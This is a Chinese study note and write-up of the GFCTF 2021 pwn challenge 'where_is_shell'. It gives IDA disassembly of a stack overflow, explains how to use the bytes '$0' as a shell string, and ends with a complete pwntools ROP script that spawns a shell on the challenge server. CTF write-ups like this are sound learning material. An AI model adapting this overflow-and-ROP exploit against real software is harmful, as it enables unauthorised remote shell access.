[GFCTF 2021]where_is_shell

第一次打CTF——PWN篇学习笔记16

在ida中看一看，发现可疑地址

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE buf[16]; // [rsp+0h] [rbp-10h] BYREF ​ system("echo 'zltt lost his shell, can you find it?'"); read(0, buf, 0x38u); return 0; } __int64 tips() { return MEMORY[0x403569](); }

看了其他师傅的wp，发现这是一个后门函数，在ida中Options-General-Disassembly-Number of opcode bytes改成10即可发现24 30（$0）可用于获得shell

.text:0000000000400537 tips proc near .text:0000000000400537 ; __unwind { .text:0000000000400537 55 push rbp .text:0000000000400538 48 89 E5 mov rbp, rsp .text:000000000040053B B8 00 00 00 00 mov eax, 0 .text:0000000000400540 E8 24 30 00 00 call near ptr 403569h .text:0000000000400545 90 nop .text:0000000000400546 5D pop rbp .text:0000000000400547 C3 retn .text:0000000000400547 ; } // starts at 400537 .text:0000000000400547 tips endp

.text:0000000000400548 ; int __fastcall main(int argc, const char **argv, const char **envp) .text:0000000000400548 public main .text:0000000000400548 main proc near ; DATA XREF: _start+1D↑o .text:0000000000400548 .text:0000000000400548 buf = byte ptr -10h .text:0000000000400548 .text:0000000000400548 ; __unwind { .text:0000000000400548 push rbp .text:0000000000400549 mov rbp, rsp .text:000000000040054C sub rsp, 10h .text:0000000000400550 lea rdi, command ; "echo 'zltt lost his shell, can you find"... .text:0000000000400557 call _system .text:000000000040055C lea rax, [rbp+buf] .text:0000000000400560 mov edx, 38h ; '8' ; nbytes .text:0000000000400565 mov rsi, rax ; buf .text:0000000000400568 mov edi, 0 ; fd .text:000000000040056D mov eax, 0 .text:0000000000400572 call _read .text:0000000000400577 mov eax, 0 .text:000000000040057C leave .text:000000000040057D retn .text:000000000040057D ; } // starts at 400548 .text:000000000040057D main endp

取system地址0x400557，据此编写脚本，成功得到flag

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node4.anna.nssctf.cn",28152) ​ pop_rdi = 0x4005e3 system = 0x400557 backdoor = 0x400540 + 1 ​ payload = cyclic(0x10 + 8) + p64(pop_rdi) + p64(backdoor) + p64(system) ​ io.sendline(payload) ​ io.interactive()